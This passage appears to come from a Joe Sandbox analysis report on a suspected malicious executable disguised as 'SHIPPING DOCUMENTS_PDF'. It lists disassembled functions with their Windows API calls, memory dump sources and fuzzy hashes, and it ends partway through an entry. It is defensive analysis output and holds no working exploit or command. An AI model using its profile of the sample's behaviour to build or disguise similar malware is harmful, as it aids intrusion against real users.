                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA9352
                                                                                    • __itow.LIBCMT ref: 00BA936A
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA9392
                                                                                    • __itow.LIBCMT ref: 00BA93A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2983881199-0
                                                                                    • Opcode ID: a6bb677a85f8173cd4dde3bf5b1433ce5d1da7e55d84a2f21c7b919c07e31f53
                                                                                    • Instruction ID: 5d5e5aa2c79838977157d133af85896c7851c2d665f8e905aba186da1a06f67c
                                                                                    • Opcode Fuzzy Hash: a6bb677a85f8173cd4dde3bf5b1433ce5d1da7e55d84a2f21c7b919c07e31f53
                                                                                    • Instruction Fuzzy Hash: A2210731709208ABDF109A609C89EAE7BFCEF4AB10F0480A5FD05D72D0DAB0CD45A795
                                                                                    Function 00BC5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 00BC5A6E
                                                                                    • GetForegroundWindow.USER32 ref: 00BC5A85
                                                                                    • GetDC.USER32(00000000), ref: 00BC5AC1
                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00BC5ACD
                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00BC5B08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                    • String ID:
                                                                                    • API String ID: 4156661090-0
                                                                                    • Opcode ID: 2417f32e834050247d7ce600ef6cbcbf85e3948e1f78e674e969b26108d97a4c
                                                                                    • Instruction ID: b6779ba382c50132d251980f2f63fae786167ec92b0f9adc63b83d7c35860843
                                                                                    • Opcode Fuzzy Hash: 2417f32e834050247d7ce600ef6cbcbf85e3948e1f78e674e969b26108d97a4c
                                                                                    • Instruction Fuzzy Hash: B5219F35A01104AFD710EF65D884AAABBE9EF48310F1480B9F80A97362DE70ED41CB90
                                                                                    Function 00B512F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B5134D
                                                                                    • SelectObject.GDI32(?,00000000), ref: 00B5135C
                                                                                    • BeginPath.GDI32(?), ref: 00B51373
                                                                                    • SelectObject.GDI32(?,00000000), ref: 00B5139C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                    • String ID:
                                                                                    • API String ID: 3225163088-0
                                                                                    • Opcode ID: 189ae3b54ace29611bae6e966355f32b9926adfb57273b94e9439d6c19ac8a6b
                                                                                    • Instruction ID: d2250bdebbea5a3b3ae303cf63a0962f9b57108ff75f7bbb29f38047b5192839
                                                                                    • Opcode Fuzzy Hash: 189ae3b54ace29611bae6e966355f32b9926adfb57273b94e9439d6c19ac8a6b
                                                                                    • Instruction Fuzzy Hash: EA219D30841608EFEB109F29DC54BAD7BE9FB42322F1486A6F811971F0D770989ACF94
                                                                                    Function 00BABC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    • Opcode ID: 780f00db40c7ccc75fcebc4349589304cced828d9261438f2d2dbad9b4b988f9
                                                                                    • Instruction ID: 12a45b54ab33a10c3d9ce708e4caf34370626f5c5107e7ebdc4e724541c028a5
                                                                                    • Opcode Fuzzy Hash: 780f00db40c7ccc75fcebc4349589304cced828d9261438f2d2dbad9b4b988f9
                                                                                    • Instruction Fuzzy Hash: 7501B5716081497BD7046B1A9D82FBBB3DCDE12398F1484A1FD29A7343FB50EE1096B0
                                                                                    Function 00BB4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00BB4ABA
                                                                                    • __beginthreadex.LIBCMT ref: 00BB4AD8
                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00BB4AED
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BB4B03
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BB4B0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                    • String ID:
                                                                                    • API String ID: 3824534824-0
                                                                                    • Opcode ID: 0420907f10fcae8d61a8a985e86577c83e93221c888ba9316243087eb93a1ffe
                                                                                    • Instruction ID: 132aa4f4a1f29f5dfdcbddccefdf0279074c0d79684ca02f6d48535d049de43e
                                                                                    • Opcode Fuzzy Hash: 0420907f10fcae8d61a8a985e86577c83e93221c888ba9316243087eb93a1ffe
                                                                                    • Instruction Fuzzy Hash: 2D11A576909615BBC7119FA89C04BEE7FECFB86320F1482A6F925D3251D7B5C90487A0
                                                                                    Function 00BA8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA821E
                                                                                    • GetLastError.KERNEL32(?,00BA7CE2,?,?,?), ref: 00BA8228
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00BA7CE2,?,?,?), ref: 00BA8237
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00BA7CE2,?,?,?), ref: 00BA823E
                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA8255
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 842720411-0
                                                                                    • Opcode ID: 3c9e05aff23b10ad6d010a793d2c43d8be760d9d45786a86d0f3ca2f4bf9dc5f
                                                                                    • Instruction ID: 291fa26f7870a52a92be68aa57c6798e7b0324fbd62b13b0b1ac2809fdb1a288
                                                                                    • Opcode Fuzzy Hash: 3c9e05aff23b10ad6d010a793d2c43d8be760d9d45786a86d0f3ca2f4bf9dc5f
                                                                                    • Instruction Fuzzy Hash: 4C016D71609205FFDB204FA5DC58D7BBBACEF8A754B50047AF90AC3220EE318D00CA60
                                                                                    Function 00BA710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?,?,00BA7455), ref: 00BA7127
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7142
                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7150
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?), ref: 00BA7160
                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA716C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3897988419-0
                                                                                    • Opcode ID: b11a965a8a49d6ca3124b2f20864b8c90e6547b1cef79e9b6998584b405a6b80
                                                                                    • Instruction ID: 75355857a1ce1a812e6dff0b5c09efad2f4284e202aca33413784c3a799def40
                                                                                    • Opcode Fuzzy Hash: b11a965a8a49d6ca3124b2f20864b8c90e6547b1cef79e9b6998584b405a6b80
                                                                                    • Instruction Fuzzy Hash: 22017C7260E205ABDB118F64DC44AAABBEDEB457A1F1440A5FD05E3220EF32DD409BA0
                                                                                    Function 00BB5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB5260
                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BB526E
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB5276
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BB5280
                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    • String ID:
                                                                                    • API String ID: 2833360925-0
                                                                                    • Opcode ID: 8ed7e89d3828c7c539ebb5ed314295a4840e7859bea778464ccd1d03788ebcbe
                                                                                    • Instruction ID: 89ca889db6e182335684be5c70bb861e6eb580bba4dac037cc5e94aabc344114
                                                                                    • Opcode Fuzzy Hash: 8ed7e89d3828c7c539ebb5ed314295a4840e7859bea778464ccd1d03788ebcbe
                                                                                    • Instruction Fuzzy Hash: 22010931D06A1ADBCF10AFA8E959AFDFBB8FB09711F40019AE942B3140DFB0555087A6
                                                                                    Function 00BA810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA8121
                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA812B
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA813A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8141
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8157
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: 97837ef28578f18ed119426e51b10abc9f42a7c0b6b926fca76b56b19d9de6af
                                                                                    • Instruction ID: 3d508210f185a69b73c17bd1cba52a68b96073fcd073a212e829c9bd476dcce1
                                                                                    • Opcode Fuzzy Hash: 97837ef28578f18ed119426e51b10abc9f42a7c0b6b926fca76b56b19d9de6af
                                                                                    • Instruction Fuzzy Hash: D5F04F71209306AFEB110FA5EC98E777BACFF4A754B040076F986D7150EE719941DA60
                                                                                    Function 00BAC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00BAC1F7
                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00BAC20E
                                                                                    • MessageBeep.USER32(00000000), ref: 00BAC226
                                                                                    • KillTimer.USER32(?,0000040A), ref: 00BAC242
                                                                                    • EndDialog.USER32(?,00000001), ref: 00BAC25C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3741023627-0
                                                                                    • Opcode ID: 0a610ce7894ba54bf8f4edd96990b8b704d43c3802a9bf4b9f551b80cb53e484
                                                                                    • Instruction ID: 9bb2afc92dd7d7ef74bc07fdc58db34242fb5ebe20644024cfc32bd308bc35e1
                                                                                    • Opcode Fuzzy Hash: 0a610ce7894ba54bf8f4edd96990b8b704d43c3802a9bf4b9f551b80cb53e484
                                                                                    • Instruction Fuzzy Hash: 4F01A73050830597EB205B50ED5EBA6BBF8FB01706F0002AAA553914E0DBF0A944CB50
                                                                                    Function 00B513B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EndPath.GDI32(?), ref: 00B513BF
                                                                                    • StrokeAndFillPath.GDI32(?,?,00B8B888,00000000,?), ref: 00B513DB
                                                                                    • SelectObject.GDI32(?,00000000), ref: 00B513EE
                                                                                    • DeleteObject.GDI32 ref: 00B51401
                                                                                    • StrokePath.GDI32(?), ref: 00B5141C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                    • String ID:
                                                                                    • API String ID: 2625713937-0
                                                                                    • Opcode ID: de6a48e505564c825aea6d7e813b05059912699d8c76dc6cdd6583e37322b3ff
                                                                                    • Instruction ID: 32babe898353d879cdd5c37cde2479c19b8ac6be91221b97454e4fa8721bfa68
                                                                                    • Opcode Fuzzy Hash: de6a48e505564c825aea6d7e813b05059912699d8c76dc6cdd6583e37322b3ff
                                                                                    • Instruction Fuzzy Hash: 6CF01D30045609EBEB115F1AEC5C7AC7BE5F742326F08C265E82A4A1F1D7304596DF10
                                                                                    Function 00BBC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 00BBC432
                                                                                    • CoCreateInstance.OLE32(00BE2D6C,00000000,00000001,00BE2BDC,?), ref: 00BBC44A
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • CoUninitialize.OLE32 ref: 00BBC6B7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2683427295-24824748
                                                                                    • Opcode ID: 9977bad676852488a2a5e8e37e2c5bffbe0b1026b93d2930bc4eea729c18d4ed
                                                                                    • Instruction ID: 96d25ce5618c715777dba571ad4481e3b629da5d18b50ee6519955c117ffe56d
                                                                                    • Opcode Fuzzy Hash: 9977bad676852488a2a5e8e37e2c5bffbe0b1026b93d2930bc4eea729c18d4ed
                                                                                    • Instruction Fuzzy Hash: 84A14DB1108205AFD700EF54C891EAFB7E8EF89345F0049ACF5559B1A2DB71E909CB52
                                                                                    Function 00B62CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                                                      • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00B57A51: _memmove.LIBCMT ref: 00B57AAB
                                                                                    • __swprintf.LIBCMT ref: 00B62ECD
                                                                                    Strings
                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B62D66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                    • API String ID: 1943609520-557222456
                                                                                    • Opcode ID: 99d7bc414b76c06ca00a2700747e2d4977139df5dd89bf4cf8a9037009546aba
                                                                                    • Instruction ID: f7a018c85978409d920cc69128658c042c34ab53d4545215014eb1fa21cc26b2
                                                                                    • Opcode Fuzzy Hash: 99d7bc414b76c06ca00a2700747e2d4977139df5dd89bf4cf8a9037009546aba
                                                                                    • Instruction Fuzzy Hash: 40919E712086019FDB14EF24D896D6EB7E8EF85711F0048EDF8559B2A1EB34ED48CB62
                                                                                    Function 00BBB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                                                    • CoInitialize.OLE32(00000000), ref: 00BBB9BB
                                                                                    • CoCreateInstance.OLE32(00BE2D6C,00000000,00000001,00BE2BDC,?), ref: 00BBB9D4
                                                                                    • CoUninitialize.OLE32 ref: 00BBB9F1
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2126378814-24824748
                                                                                    • Opcode ID: e3c64807a0b1efd88f0322ec15e1e85462ef4fe41af005a50fae0855401e50da
                                                                                    • Instruction ID: 366f0ebcb969bbbe5a4274d319f0fae481aecda34b48948335192f71be741723
                                                                                    • Opcode Fuzzy Hash: e3c64807a0b1efd88f0322ec15e1e85462ef4fe41af005a50fae0855401e50da
